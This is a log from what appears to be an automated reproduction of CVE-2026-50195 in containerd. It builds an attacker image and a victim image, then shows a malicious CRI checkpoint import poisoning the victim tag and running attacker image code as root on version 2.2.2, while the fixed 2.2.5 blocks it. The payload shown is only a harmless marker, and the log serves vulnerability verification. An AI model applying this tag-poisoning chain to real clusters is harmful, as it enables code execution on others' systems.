[07:59:15] recorded source patch check at logs/source/patch_check.txt [07:59:15] wrote runner Dockerfile/entrypoint/exploit helpers under bundle/repro [07:59:15] Phase 1: start local OCI registry on Docker network [07:59:17] registry is reachable from Docker network; host Docker pushes will use localhost:5000 (Docker daemon path) [07:59:17] Phase 2: build and push pause, legitimate victim, and attacker images 3.10: Pulling from pause Digest: sha256:ee6521f290b2168b6e0935a181d4cff9be1ac3f505666ef0e3c98fae8199917a Status: Image is up to date for registry.k8s.io/pause:3.10 registry.k8s.io/pause:3.10 The push refers to repository [localhost:5000/pause] 61d9e957431b: Pushed 3.10: digest: sha256:7c38f24774e3cbd906d2d33c38354ccf787635581c122965132c9bd309754d4a size: 501 Info -> Not all multiplatform-content is present and only the available single-platform image was pushed sha256:ee6521f290b2168b6e0935a181d4cff9be1ac3f505666ef0e3c98fae8199917a -> sha256:7c38f24774e3cbd906d2d33c38354ccf787635581c122965132c9bd309754d4a DEPRECATED: The legacy builder is deprecated and will be removed in a future release. Install the buildx component to build images with BuildKit: https://docs.docker.com/go/buildx/ Sending build context to Docker daemon 2.048kB Step 1/3 : FROM alpine:3.20 ---> d9e853e87e55 Step 2/3 : RUN mkdir -p /attacker && echo "CVE-2026-50195 attacker rootfs marker" > /attacker/marker.txt ---> Using cache ---> f0d4dda8febe Step 3/3 : CMD ["/bin/sh", "-c", "echo PRUVA_CODE_EXEC_FROM_ATTACKER_IMAGE uid=$(id -u) gid=$(id -g) image=attacker; sleep 1"] ---> Using cache ---> 25ff2e0f0b20 Successfully built 25ff2e0f0b20 Successfully tagged localhost:5000/attacker:latest The push refers to repository [localhost:5000/attacker] 875f4deeecbb: Pushed 25f1d6b1951a: Pushed latest: digest: sha256:25ff2e0f0b209d91423507e05f4a369614a1014f46b6bceea502fd24fe7d289f size: 745 DEPRECATED: The legacy builder is deprecated and will be removed in a future release. Install the buildx component to build images with BuildKit: https://docs.docker.com/go/buildx/ Sending build context to Docker daemon 2.048kB Step 1/2 : FROM alpine:3.20 ---> d9e853e87e55 Step 2/2 : CMD ["/bin/sh", "-c", "echo LEGITIMATE_VICTIM_IMAGE_SHOULD_NOT_RUN; sleep 1"] ---> Using cache ---> fcec410144b2 Successfully built fcec410144b2 Successfully tagged localhost:5000/victim:stable The push refers to repository [localhost:5000/victim] 25f1d6b1951a: Mounted from attacker stable: digest: sha256:fcec410144b2936d66f3fb9774d9eb991778a8c7715bae5adac7328204ef43c3 size: 530 [07:59:18] test images pushed: attacker:latest and victim:stable (victim is not pre-pulled into containerd during the proof) [07:59:18] Phase 3: prepare official vulnerable and fixed containerd binaries [07:59:18] Phase 4: build privileged runner images for vulnerable and fixed containerd [07:59:18] building runner image pruva-ctrd-runner:v222-codeexec for containerd 2.2.2 DEPRECATED: The legacy builder is deprecated and will be removed in a future release. Install the buildx component to build images with BuildKit: https://docs.docker.com/go/buildx/ Sending build context to Docker daemon 134.6MB Step 1/15 : FROM ubuntu:22.04 ---> 0e0a0fc6d18f Step 2/15 : ENV DEBIAN_FRONTEND=noninteractive ---> Using cache ---> dd6506bffc2e Step 3/15 : RUN apt-get update && apt-get install -y --no-install-recommends ca-certificates curl wget jq iptables iproute2 procps socat tar gzip findutils libseccomp2 criu && rm -rf /var/lib/apt/lists/* ---> Using cache ---> 5a7a95738d24 Step 4/15 : RUN mkdir -p /opt/cni/bin && curl -sL "https://github.com/containernetworking/plugins/releases/download/v1.5.1/cni-plugins-linux-amd64-v1.5.1.tgz" | tar xz -C /opt/cni/bin ---> Using cache ---> c85ce5e12d2f Step 5/15 : RUN mkdir -p /opt/containerd/bin /opt/bin /etc/containerd/certs.d /var/lib/containerd /run/containerd /etc/cni/net.d ---> Using cache ---> 1a8bc1152ea5 Step 6/15 : COPY bin/containerd /opt/containerd/bin/containerd ---> Using cache ---> 60f28262db50 Step 7/15 : COPY bin/containerd-shim-runc-v2 /opt/containerd/bin/containerd-shim-runc-v2 ---> Using cache ---> 5ecbafdbad3c Step 8/15 : COPY bin/ctr /opt/containerd/bin/ctr ---> Using cache ---> 92b94afab694 Step 9/15 : COPY runc.amd64 /opt/bin/runc ---> Using cache ---> a8fd374f3894 Step 10/15 : COPY crictl/crictl /opt/bin/crictl ---> Using cache ---> bec3c452da2e Step 11/15 : RUN chmod +x /opt/containerd/bin/* /opt/bin/runc /opt/bin/crictl && ln -sf /opt/bin/runc /usr/local/bin/runc && ln -sf /opt/containerd/bin/containerd /usr/local/bin/containerd && ln -sf /opt/containerd/bin/containerd-shim-runc-v2 /usr/local/bin/containerd-shim-runc-v2 && ln -sf /opt/containerd/bin/ctr /usr/local/bin/ctr && ln -sf /opt/bin/crictl /usr/local/bin/crictl ---> Using cache ---> 484f2b60f6c5 Step 12/15 : COPY entrypoint.sh /entrypoint.sh ---> Using cache ---> fb5e86cd7b84 Step 13/15 : COPY exploit.sh /exploit.sh ---> Using cache ---> 3ec0df5171e8 Step 14/15 : RUN chmod +x /entrypoint.sh /exploit.sh ---> Using cache ---> 85ae5494af62 Step 15/15 : ENTRYPOINT ["/entrypoint.sh"] ---> Using cache ---> fed5891de828 Successfully built fed5891de828 Successfully tagged pruva-ctrd-runner:v222-codeexec [07:59:18] building runner image pruva-ctrd-runner:v225-fixed for containerd 2.2.5 DEPRECATED: The legacy builder is deprecated and will be removed in a future release. Install the buildx component to build images with BuildKit: https://docs.docker.com/go/buildx/ Sending build context to Docker daemon 134.7MB Step 1/15 : FROM ubuntu:22.04 ---> 0e0a0fc6d18f Step 2/15 : ENV DEBIAN_FRONTEND=noninteractive ---> Using cache ---> dd6506bffc2e Step 3/15 : RUN apt-get update && apt-get install -y --no-install-recommends ca-certificates curl wget jq iptables iproute2 procps socat tar gzip findutils libseccomp2 criu && rm -rf /var/lib/apt/lists/* ---> Using cache ---> 5a7a95738d24 Step 4/15 : RUN mkdir -p /opt/cni/bin && curl -sL "https://github.com/containernetworking/plugins/releases/download/v1.5.1/cni-plugins-linux-amd64-v1.5.1.tgz" | tar xz -C /opt/cni/bin ---> Using cache ---> c85ce5e12d2f Step 5/15 : RUN mkdir -p /opt/containerd/bin /opt/bin /etc/containerd/certs.d /var/lib/containerd /run/containerd /etc/cni/net.d ---> Using cache ---> 1a8bc1152ea5 Step 6/15 : COPY bin/containerd /opt/containerd/bin/containerd ---> Using cache ---> 5ee2eba3551b Step 7/15 : COPY bin/containerd-shim-runc-v2 /opt/containerd/bin/containerd-shim-runc-v2 ---> Using cache ---> 30a88caad1bc Step 8/15 : COPY bin/ctr /opt/containerd/bin/ctr ---> Using cache ---> 2a82971eab12 Step 9/15 : COPY runc.amd64 /opt/bin/runc ---> Using cache ---> c569a59d16c9 Step 10/15 : COPY crictl/crictl /opt/bin/crictl ---> Using cache ---> f5bcf441851f Step 11/15 : RUN chmod +x /opt/containerd/bin/* /opt/bin/runc /opt/bin/crictl && ln -sf /opt/bin/runc /usr/local/bin/runc && ln -sf /opt/containerd/bin/containerd /usr/local/bin/containerd && ln -sf /opt/containerd/bin/containerd-shim-runc-v2 /usr/local/bin/containerd-shim-runc-v2 && ln -sf /opt/containerd/bin/ctr /usr/local/bin/ctr && ln -sf /opt/bin/crictl /usr/local/bin/crictl ---> Using cache ---> 7fa9df0360fd Step 12/15 : COPY entrypoint.sh /entrypoint.sh ---> Using cache ---> 0c8c984f31fd Step 13/15 : COPY exploit.sh /exploit.sh ---> Using cache ---> 6a5a0b5400bb Step 14/15 : RUN chmod +x /entrypoint.sh /exploit.sh ---> Using cache ---> 7f7ba416d7e7 Step 15/15 : ENTRYPOINT ["/entrypoint.sh"] ---> Using cache ---> 661d1af439c9 Successfully built 661d1af439c9 Successfully tagged pruva-ctrd-runner:v225-fixed [07:59:19] Phase 5/vulnerable_v222: start pruva-ctrd-runner:v222-codeexec (vulnerable) and drive CRI exploit [07:59:22] vulnerable_v222 result: VULN_CODE_EXEC_CONFIRMED (docker exec rc=0) [07:59:22] Phase 5/fixed_v225: start pruva-ctrd-runner:v225-fixed (fixed) and drive CRI exploit [07:59:25] fixed_v225 result: FIXED_BLOCKED (docker exec rc=0) [07:59:25] summary evidence written to logs/exploit_evidence.txt Vulnerable result: VULN_CODE_EXEC_CONFIRMED POST-CHECKPOINT: attacker image entries = 1 POST-CHECKPOINT: poisoned victim tag entries = 1 PRUVA_CODE_EXEC_FROM_ATTACKER_IMAGE uid=0 gid=0 image=attacker VERDICT: VULN_CODE_EXEC_CONFIRMED - malicious checkpoint poisoned localhost:5000/victim:stable with localhost:5000/attacker:latest and StartContainer executed attacker-controlled image code Fixed result: FIXED_BLOCKED POST-CHECKPOINT: attacker image entries = 1 POST-CHECKPOINT: poisoned victim tag entries = 0 victim CreateContainer failed as expected when the fixed runtime does not create the poisoned local tag VERDICT: FIXED_BLOCKED - fixed containerd did not create the victim tag and no attacker code executed from localhost:5000/victim:stable [07:59:25] CONFIRMED: CVE-2026-50195 real CRI checkpoint import code-execution chain reproduced with fixed negative control.